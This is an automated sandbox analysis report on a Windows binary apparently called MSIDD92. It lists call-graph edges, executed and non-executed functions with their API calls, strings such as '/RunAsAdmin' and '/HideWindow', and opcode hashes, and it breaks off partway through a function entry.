__ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 35238->35242 35240 d76ff1 IUnknown_QueryService 35239->35240 35249 d76fe8 VariantClear 35239->35249 35245 d77020 35240->35245 35240->35249 35241->35238 35243 d77516 35242->35243 35243->35106 35246 d77071 IUnknown_QueryInterface_Proxy 35245->35246 35245->35249 35247 d7709a 35246->35247 35246->35249 35248 d770bf IUnknown_QueryInterface_Proxy 35247->35248 35247->35249 35248->35249 35250 d770e8 CoAllowSetForegroundWindow 35248->35250 35249->35236 35251 d77102 SysAllocString 35250->35251 35252 d77168 SysAllocString 35250->35252 35255 d7712f 35251->35255 35256 d77138 SysAllocString 35251->35256 35252->35251 35254 d7751f _com_issue_error 35252->35254 35358 d71910 LocalFree RaiseException Concurrency::cancel_current_task 35254->35358 35255->35254 35255->35256 35258 d7717d VariantInit 35256->35258 35259 d7715d 35256->35259 35263 d771fd 35258->35263 35259->35254 35259->35258 35260 d77533 35260->35106 35261 d77201 VariantClear VariantClear VariantClear VariantClear SysFreeString 35261->35249 35263->35261 35275 d7724b 35263->35275 35264 d73b40 44 API calls 35264->35275 35268 d7751a 35357 d9c5c2 41 API calls 2 library calls 35268->35357 35269 d772ef LocalFree 35269->35275 35271 d77344 OpenProcess WaitForSingleObject 35273 d7737a GetExitCodeProcess 35271->35273 35271->35275 35273->35275 35274 d773dd LocalFree 35274->35275 35275->35261 35275->35263 35275->35264 35275->35268 35275->35269 35275->35271 35275->35274 35276 d77394 CloseHandle 35275->35276 35353 d740a0 50 API calls 3 library calls 35275->35353 35354 d761d0 95 API calls 2 library calls 35275->35354 35355 d73cc0 42 API calls collate 35275->35355 35356 d76a60 10 API calls 35275->35356 35276->35275 35278 d776d1 35277->35278 35359 d72100 42 API calls 4 library calls 35278->35359 35280 d776e9 35360 d72100 42 API calls 4 library calls 35280->35360 35282 d77700 35361 d77db0 59 API calls 2 library calls 35282->35361 35284 d77718 35285 d77a7b 35284->35285 35286 d77747 35284->35286 35362 d72750 41 API calls 35284->35362 35370 d71910 LocalFree RaiseException Concurrency::cancel_current_task 35285->35370 35363 da0d39 43 API calls 35286->35363 35290 d77a85 GetWindowThreadProcessId 35291 d77ae1 35290->35291 35292 d77aae GetWindowLongW 35290->35292 35291->35106 35292->35106 35293 d77755 35293->35285 35294 d77766 35293->35294 35364 d72100 42 API calls 4 library calls 35294->35364 35296 d7784f 35297 d778a4 GetForegroundWindow 35296->35297 35298 d778ad 35296->35298 35297->35298 35299 d778bd ShellExecuteExW 35298->35299 35300 d778ce 35299->35300 35301 d778d7 35299->35301 35367 d77c30 6 API calls 35300->35367 35304 d77912 35301->35304 35306 d778ed ShellExecuteExW 35301->35306 35302 d77816 GetWindowsDirectoryW 35365 d71980 70 API calls 35302->35365 35309 d779c8 35304->35309 35310 d77938 GetModuleHandleW GetProcAddress 35304->35310 35306->35304 35308 d77909 35306->35308 35307 d77837 35366 d71980 70 API calls 35307->35366 35368 d77c30 6 API calls 35308->35368 35314 d779f2 35309->35314 35317 d779dc WaitForSingleObject GetExitCodeProcess 35309->35317 35316 d77952 AllowSetForegroundWindow 35310->35316 35311 d7777b 35311->35296 35311->35302 35369 d77d30 CloseHandle 35314->35369 35316->35309 35318 d77960 35316->35318 35317->35314 35318->35309 35319 d77969 GetModuleHandleW GetProcAddress 35318->35319 35319->35309 35320 d77984 35319->35320 35320->35309 35324 d77995 Sleep EnumWindows 35320->35324 35321 d779fe 35322 d97708 __ehhandler$??1UMSThreadProxy@details@Concurrency@@UAE@XZ 5 API calls 35321->35322 35323 d77a73 35322->35323 35323->35106 35324->35320 35325 d779c1 BringWindowToTop 35324->35325 35325->35309 35327 d72548 35326->35327 35328 d7259c 35326->35328 35347 d97875 6 API calls 35327->35347 35329 d71ff0 35328->35329 35350 d97875 6 API calls 35328->35350 35329->35214 35329->35218 35332 d72552 35332->35328 35333 d7255e GetProcessHeap 35332->35333 35348 d97b87 44 API calls 35333->35348 35334 d725b6 35334->35329 35351 d97b87 44 API calls 35334->35351 35336 d7258b 35349 d9782b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35336->35349 35339 d72616 35352 d9782b EnterCriticalSection LeaveCriticalSection RtlWakeAllConditionVariable SetEvent ResetEvent 35339->35352 35341->35222 35342->35226 35343->35227 35344->35216 35345->35216 35346->35219 35347->35332 35348->35336 35349->35328 35350->35334 35351->35339 35352->35329 35353->35275 35354->35275 35355->35275 35356->35275 35358->35260 35359->35280 35360->35282 35361->35284 35362->35286 35363->35293 35364->35311 35365->35307 35366->35296 35367->35301 35368->35304 35369->35321 35370->35290 35371 d77f70 35374 d77fd0 GetTokenInformation 35371->35374 35375 d77fa8 35374->35375 35376 d7804e GetLastError 35374->35376 35376->35375 35377 d78059 35376->35377 35378 d7809e GetTokenInformation 35377->35378 35379 d78069 _Getvals 35377->35379 35380 d78079 35377->35380 35378->35375 35379->35378 35383 d78260 45 API calls 3 library calls 35380->35383 35382 d78082 35382->35378 35383->35382

                                                                      Executed Functions

                                                                      Function 00D76EE0 Relevance: 46.0, APIs: 25, Strings: 1, Instructions: 519comCOMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 0 d76ee0-d76f31 call d75f90 3 d76f55-d76f8d CoInitialize CoCreateInstance 0->3 4 d76f33-d76f50 call d77660 0->4 6 d76f8f-d76f93 3->6 7 d76f98-d76fe6 VariantInit 3->7 11 d774ff-d77519 call d97708 4->11 9 d774d8-d774e1 6->9 14 d76ff1-d77015 IUnknown_QueryService 7->14 15 d76fe8-d76fec 7->15 12 d774e3-d774e5 9->12 13 d774e9-d774f4 9->13 12->13 16 d774f6 CoUninitialize 13->16 17 d774fc 13->17 20 d77017-d7701b 14->20 21 d77020-d7703a 14->21 19 d774ba-d774c3 15->19 16->17 17->11 24 d774c5-d774c7 19->24 25 d774cb-d774d6 VariantClear 19->25 23 d774a9-d774b2 20->23 28 d77045-d77066 21->28 29 d7703c-d77040 21->29 23->19 27 d774b4-d774b6 23->27 24->25 25->9 27->19 33 d77071-d7708f IUnknown_QueryInterface_Proxy 28->33 34 d77068-d7706c 28->34 30 d77498-d774a1 29->30 30->23 31 d774a3-d774a5 30->31 31->23 36 d77091-d77095 33->36 37 d7709a-d770b4 33->37 35 d77487-d77490 34->35 35->30 38 d77492-d77494 35->38 39 d77476-d7747f 36->39 42 d770b6-d770ba 37->42 43 d770bf-d770dd IUnknown_QueryInterface_Proxy 37->43 38->30 39->35 41 d77481-d77483 39->41 41->35 44 d77465-d7746e 42->44 45 d770df-d770e3 43->45 46 d770e8-d77100 CoAllowSetForegroundWindow 43->46 44->39 50 d77470-d77472 44->50 47 d77454-d7745d 45->47 48 d77102-d77104 46->48 49 d77168-d77175 SysAllocString 46->49 47->44 52 d7745f-d77461 47->52 51 d7710a-d7712d SysAllocString 48->51 53 d7717b 49->53 54 d77529-d77571 call d71910 49->54 50->39 55 d7712f-d77132 51->55 56 d77138-d7715b SysAllocString 51->56 52->44 53->51 64 d77573-d77575 54->64 65 d77579-d77587 54->65 55->56 58 d7751f-d77524 call d81cb0 55->58 59 d7717d-d771ff VariantInit 56->59 60 d7715d-d77160 56->60 58->54 67 d77201-d77205 59->67 68 d7720a-d7720e 59->68 60->58 63 d77166 60->63 63->59 64->65 69 d7740f-d7744e VariantClear * 4 SysFreeString 67->69 70 d77214 68->70 71 d7740b 68->71 69->47 72 d77216-d77238 70->72 71->69 73 d77240-d77249 72->73 73->73 74 d7724b-d772c5 call d73b40 call d740a0 call d761d0 call d73cc0 73->74 83 d772c7-d772d8 74->83 84 d772f6-d77315 74->84 85 d772eb-d772ed 83->85 86 d772da-d772e5 83->86 87 d77317-d7731b 84->87 88 d7731d 84->88 85->84 90 d772ef-d772f0 LocalFree 85->90 86->85 89 d7751a call d9c5c2 86->89 91 d77324-d77326 87->91 88->91 89->58 90->84 92 d773a5-d773b5 91->92 93 d77328-d77332 91->93 95 d773b7-d773c6 92->95 96 d773fc-d77405 92->96 97 d77344-d77378 OpenProcess WaitForSingleObject 93->97 98 d77334-d77342 call d76a60 93->98 99 d773d9-d773db 95->99 100 d773c8-d773d3 95->100 96->71 96->72 102 d77382-d77392 97->102 103 d7737a-d7737c GetExitCodeProcess 97->103 98->97 104 d773e4-d773f5 99->104 105 d773dd-d773de LocalFree 99->105 100->89 100->99 102->92 107 d77394-d7739b CloseHandle 102->107 103->102 104->96 105->104 107->92
                                                                      APIs
                                                                        • Part of subcall function 00D75F90: GetCurrentProcess.KERNEL32(00000008,?,862265DA), ref: 00D75FA0
                                                                        • Part of subcall function 00D75F90: OpenProcessToken.ADVAPI32(00000000), ref: 00D75FA7
                                                                      • CoInitialize.OLE32(00000000), ref: 00D76F55
                                                                      • CoCreateInstance.OLE32(00DBD310,00000000,00000004,00DCB320,00000000,?), ref: 00D76F85
                                                                      • CoUninitialize.OLE32 ref: 00D774F6
                                                                      • _com_issue_error.COMSUPP ref: 00D77524
                                                                        • Part of subcall function 00D71910: LocalFree.KERNEL32(?,862265DA,?,00000000,00DB92C0,000000FF,?,?,00DD1348,00000000,00D716D0,80004005), ref: 00D7195C
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Process$CreateCurrentFreeInitializeInstanceLocalOpenTokenUninitialize_com_issue_error
                                                                      • String ID: $
                                                                      • API String ID: 2507920217-3993045852
                                                                      • Opcode ID: 1370c3ef71312e5141a82b05999aec04c1474bc038cb8188276cd0e1a90f0907
                                                                      • Instruction ID: eda710998b2d98c0ac3f354baaa2a7ae38c6fa1294a7c51bf7de5074d514a09d
                                                                      • Opcode Fuzzy Hash: 1370c3ef71312e5141a82b05999aec04c1474bc038cb8188276cd0e1a90f0907
                                                                      • Instruction Fuzzy Hash: 94229170E08388DFEB11CFA8C948BADBBB4AF45304F14859DE449EB391E7759A45CB21
                                                                      Function 00D75F90 Relevance: 6.0, APIs: 4, Instructions: 35COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 108 d75f90-d75faf GetCurrentProcess OpenProcessToken 109 d75fb7-d75fe4 GetTokenInformation 108->109 110 d75fb1-d75fb6 108->110 111 d75fe6-d75feb 109->111 112 d75fee-d75ffe CloseHandle 109->112 111->112
                                                                      APIs
                                                                      • GetCurrentProcess.KERNEL32(00000008,?,862265DA), ref: 00D75FA0
                                                                      • OpenProcessToken.ADVAPI32(00000000), ref: 00D75FA7
                                                                      • GetTokenInformation.KERNELBASE(?,00000014(TokenIntegrityLevel),?,00000004,?), ref: 00D75FDC
                                                                      • CloseHandle.KERNEL32(?), ref: 00D75FF2
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ProcessToken$CloseCurrentHandleInformationOpen
                                                                      • String ID:
                                                                      • API String ID: 215268677-0
                                                                      • Opcode ID: 59f4a39eadfef53226a5d080c8fb751ce0477af19a60f1a405b5248ee4d06f7d
                                                                      • Instruction ID: f069d9ae3fbc91c7395c59c62739e28e148401a303a46530b25db8c8602890ba
                                                                      • Opcode Fuzzy Hash: 59f4a39eadfef53226a5d080c8fb751ce0477af19a60f1a405b5248ee4d06f7d
                                                                      • Instruction Fuzzy Hash: A1F01274144301EBEB10AF20EC45B9AB7E9BF44705F548919F984C2260E379D51DDA73
                                                                      Function 00D81A20 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      APIs
                                                                      • GetCommandLineW.KERNEL32(862265DA,?,0000FFFF), ref: 00D81A4D
                                                                        • Part of subcall function 00D74EC0: LocalAlloc.KERNEL32(00000040,00000000,?,?,?,?,00000000,00000000,?,?), ref: 00D74EDD
                                                                      • ExitProcess.KERNEL32 ref: 00D81C27
                                                                        • Part of subcall function 00D78790: CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000002,00000080,00000000,?,?,?,?,?,?,?,?,00000000), ref: 00D7880D
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: AllocCommandCreateExitFileLineLocalProcess
                                                                      • String ID: Full command line:
                                                                      • API String ID: 1878577176-831861440
                                                                      • Opcode ID: 42965dbcab8f5410ff365bb5b2cc840571602d0e1f9e3767262a4e40a3001654
                                                                      • Instruction ID: 33f72d75938864db370f4561d4c7014990f48fc509a3b9734361afcae43ef029
                                                                      • Opcode Fuzzy Hash: 42965dbcab8f5410ff365bb5b2cc840571602d0e1f9e3767262a4e40a3001654
                                                                      • Instruction Fuzzy Hash: D2516C35810168DACB25EB60CC59BEEB7B5EF10304F1481D9E009672A2EF745F49DBB2
                                                                      Function 00D77FD0 Relevance: 4.6, APIs: 3, Instructions: 85COMMON
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 171 d77fd0-d7804c GetTokenInformation 172 d780b0-d780c3 171->172 173 d7804e-d78057 GetLastError 171->173 173->172 174 d78059-d78067 173->174 175 d7806e 174->175 176 d78069-d7806c 174->176 178 d78070-d78077 175->178 179 d7809e-d780aa GetTokenInformation 175->179 177 d7809b 176->177 177->179 180 d78087-d78098 call d98e90 178->180 181 d78079-d78085 call d78260 178->181 179->172 180->177 181->179
                                                                      APIs
                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),00000000,00000000,00D77FA8,862265DA), ref: 00D78044
                                                                      • GetLastError.KERNEL32(?,TokenIntegrityLevel,00000000,00000000,00D77FA8,862265DA), ref: 00D7804E
                                                                      • GetTokenInformation.KERNELBASE(?,00000001(TokenIntegrityLevel),?,00000000,00000000,?,TokenIntegrityLevel,00000000,00000000,00D77FA8,862265DA), ref: 00D780AA
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: InformationToken$ErrorLast
                                                                      • String ID:
                                                                      • API String ID: 2567405617-0
                                                                      • Opcode ID: 876bd2b6b31fded928fb374afe0e64c15a59bdef07f099a20c4eb3b065f71027
                                                                      • Instruction ID: f7e338630991c32866ae33741e2a1204df7d497fc73f31a1af2258a66b1ccfa8
                                                                      • Opcode Fuzzy Hash: 876bd2b6b31fded928fb374afe0e64c15a59bdef07f099a20c4eb3b065f71027
                                                                      • Instruction Fuzzy Hash: BD314C71A40615EFDB20CF59CC49BAFBBF9FB44710F10852AE515E7280EBB5A9049BA0
                                                                      Function 00DAC72B Relevance: 1.5, APIs: 1, Instructions: 39memoryCOMMONLIBRARYCODE
                                                                      Download Yara Rule

                                                                      Control-flow Graph

                                                                      • Executed
                                                                      • Not Executed
                                                                      control_flow_graph 186 dac72b-dac736 187 dac738-dac742 186->187 188 dac744-dac74a 186->188 187->188 189 dac778-dac783 call d9c6b0 187->189 190 dac74c-dac74d 188->190 191 dac763-dac774 RtlAllocateHeap 188->191 195 dac785-dac787 189->195 190->191 192 dac74f-dac756 call daa8b7 191->192 193 dac776 191->193 192->189 199 dac758-dac761 call db15f6 192->199 193->195 199->189 199->191
                                                                      APIs
                                                                      • RtlAllocateHeap.NTDLL(00000008,?,?,?,00DAAFDA,00000001,00000364,?,00000006,000000FF,?,00D9C282,?,?,?), ref: 00DAC76C
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: AllocateHeap
                                                                      • String ID:
                                                                      • API String ID: 1279760036-0
                                                                      • Opcode ID: 0ccfcef768801cffd4e04fb24156e00a5b005bb9f57d4d8e2d97f8b14a69026f
                                                                      • Instruction ID: 9b2cde39d30b0c2b3de8dd739431eb61105db1d4a4187612583de0746fce5d1a
                                                                      • Opcode Fuzzy Hash: 0ccfcef768801cffd4e04fb24156e00a5b005bb9f57d4d8e2d97f8b14a69026f
                                                                      • Instruction Fuzzy Hash: 91F0E231621224ABEB312B7A9C45A6B37CCDF53771B18A212AC05E6290DF60D801CAF1

                                                                      Non-executed Functions

                                                                      Function 00D7D060 Relevance: 12.7, APIs: 5, Strings: 2, Instructions: 472COMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: _swprintf$FreeLocal
                                                                      • String ID: %$+
                                                                      • API String ID: 2429749586-2626897407
                                                                      • Opcode ID: 6ddb1ce58ea9b15fbf6866f7f82ca90645062a44ff9518a216b2b63d97002160
                                                                      • Instruction ID: 82383b3340b1ed9b1339d384deca47146708c61e9aa67b84f6f23d7e8b5c93ea
                                                                      • Opcode Fuzzy Hash: 6ddb1ce58ea9b15fbf6866f7f82ca90645062a44ff9518a216b2b63d97002160
                                                                      • Instruction Fuzzy Hash: 8102B071E102199FDB15DF68CC41BAEBBB6FF49300F148629F815AB281E735A941CBB1
                                                                      Function 00D80E90 Relevance: 11.0, APIs: 2, Strings: 4, Instructions: 455registryCOMMON
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • RegOpenKeyExW.ADVAPI32(?,-00000002,00000000,00000001,?), ref: 00D812C4
                                                                      • RegQueryValueExW.ADVAPI32(?,00000000,00000000,00000000,00DD57C0,00000800), ref: 00D812E1
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: OpenQueryValue
                                                                      • String ID: /DontWait $/EnforcedRunAsAdmin $/HideWindow$/RunAsAdmin
                                                                      • API String ID: 4153817207-1914306501
                                                                      • Opcode ID: 8a238dd30cd1c64d663ac774ffca9a55fe55de37aeb4ff5ea0b023f33d064a69
                                                                      • Instruction ID: d064cc9d599419300c24075113991cfb4f0736a2cb0ec5efd4fa3fefafdfa62b
                                                                      • Opcode Fuzzy Hash: 8a238dd30cd1c64d663ac774ffca9a55fe55de37aeb4ff5ea0b023f33d064a69
                                                                      • Instruction Fuzzy Hash: 8EE1DE28A043528ACB34BF14C841776B3E9EF95B40F5D846AE985CB295E771CC8BC3B1
                                                                      Function 00DB3BA3 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 85COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      • GetLocaleInfoW.KERNEL32(?,2000000B,00DB3EC1,00000002,00000000,?,?,?,00DB3EC1,?,00000000), ref: 00DB3C3C
                                                                      • GetLocaleInfoW.KERNEL32(?,20001004,00DB3EC1,00000002,00000000,?,?,?,00DB3EC1,?,00000000), ref: 00DB3C65
                                                                      • GetACP.KERNEL32(?,?,00DB3EC1,?,00000000), ref: 00DB3C7A
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: InfoLocale
                                                                      • String ID: ACP$OCP
                                                                      • API String ID: 2299586839-711371036
                                                                      • Opcode ID: 8693212dd22b1bd2618098af44bf11c818239eb14bb8e4e1c914ce05b8823a6e
                                                                      • Instruction ID: db39cc84e20603a95b7ed046389e07f41964118c61859a933058b6e6e0ad9f5f
                                                                      • Opcode Fuzzy Hash: 8693212dd22b1bd2618098af44bf11c818239eb14bb8e4e1c914ce05b8823a6e
                                                                      • Instruction Fuzzy Hash: E9217432600201EBDB348F99C901AE77BA6EF50B50B5E8528E94BE7214E732DF41E370
                                                                      Function 00DB3D78 Relevance: 7.7, APIs: 5, Instructions: 183COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DAAE3C: GetLastError.KERNEL32(?,00000008,00DB03BC), ref: 00DAAE40
                                                                        • Part of subcall function 00DAAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00DAAEE2
                                                                      • GetUserDefaultLCID.KERNEL32(?,?,?,00000055,?), ref: 00DB3E84
                                                                      • IsValidCodePage.KERNEL32(00000000), ref: 00DB3ECD
                                                                      • IsValidLocale.KERNEL32(?,00000001), ref: 00DB3EDC
                                                                      • GetLocaleInfoW.KERNEL32(?,00001001,-00000050,00000040,?,000000D0,00000055,00000000,?,?,00000055,00000000), ref: 00DB3F24
                                                                      • GetLocaleInfoW.KERNEL32(?,00001002,00000030,00000040), ref: 00DB3F43
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: Locale$ErrorInfoLastValid$CodeDefaultPageUser
                                                                      • String ID:
                                                                      • API String ID: 415426439-0
                                                                      • Opcode ID: 4d1db3a0994e7aec63a7a5b103f0173f42bfaa649aeb5bc21cd95aafac5f3b74
                                                                      • Instruction ID: 7a1c8d271d35b4a13c8a89c0b971fb15a436356acb73b9f7559d59964bc3f529
                                                                      • Opcode Fuzzy Hash: 4d1db3a0994e7aec63a7a5b103f0173f42bfaa649aeb5bc21cd95aafac5f3b74
                                                                      • Instruction Fuzzy Hash: 0F514D72A00206EBDB10DBA5CC45AFA77B9EF49700F18462AF906E7190EB71DA04DB71
                                                                      Function 00DB3414 Relevance: 7.3, APIs: 3, Strings: 1, Instructions: 251COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                        • Part of subcall function 00DAAE3C: GetLastError.KERNEL32(?,00000008,00DB03BC), ref: 00DAAE40
                                                                        • Part of subcall function 00DAAE3C: SetLastError.KERNEL32(00000000,00000000,00000006,000000FF), ref: 00DAAEE2
                                                                      • GetACP.KERNEL32(?,?,?,?,?,?,00DA994B,?,?,?,00000055,?,-00000050,?,?,00000004), ref: 00DB34D5
                                                                      • IsValidCodePage.KERNEL32(00000000,?,?,?,?,?,?,00DA994B,?,?,?,00000055,?,-00000050,?,?), ref: 00DB3500
                                                                      • GetLocaleInfoW.KERNEL32(00000000,?,?,00000078,-00000050,00000000,000000D0), ref: 00DB3663
                                                                      Strings
                                                                      Memory Dump Source
                                                                      • Source File: 0000000D.00000002.1292874221.0000000000D71000.00000020.00000001.01000000.00000005.sdmp, Offset: 00D70000, based on PE: true
                                                                      • Associated: 0000000D.00000002.1291861815.0000000000D70000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294056060.0000000000DBD000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294285172.0000000000DD3000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                      • Associated: 0000000D.00000002.1294323906.0000000000DD7000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_13_2_d70000_MSIDD92.jbxd
                                                                      Similarity
                                                                      • API ID: ErrorLast$CodeInfoLocalePageValid
                                                                      • String ID: utf8
                                                                      • API String ID: 607553120-905460609
                                                                      • Opcode ID: cc2b36bd1e7a362dbfc1062beed929d279d3a0624f036d0bfb8c94800ecad6bd
                                                                      • Instruction ID: a51e6ae1a99a881530f50f5842e860715e272788a4590656dea3c80295e333fd
                                                                      • Opcode Fuzzy Hash: cc2b36bd1e7a362dbfc1062beed929d279d3a0624f036d0bfb8c94800ecad6bd
                                                                      • Instruction Fuzzy Hash: B271DF72A00306EADB25AB75CC86BEA73E8EF45700F184429F547D7281FB74EA45A770
                                                                      Function 00DAB336 Relevance: 6.3, APIs: 4, Instructions: 337COMMONLIBRARYCODE
                                                                      Download Yara Rule
                                                                      APIs
                                                                      Memory Dump Source
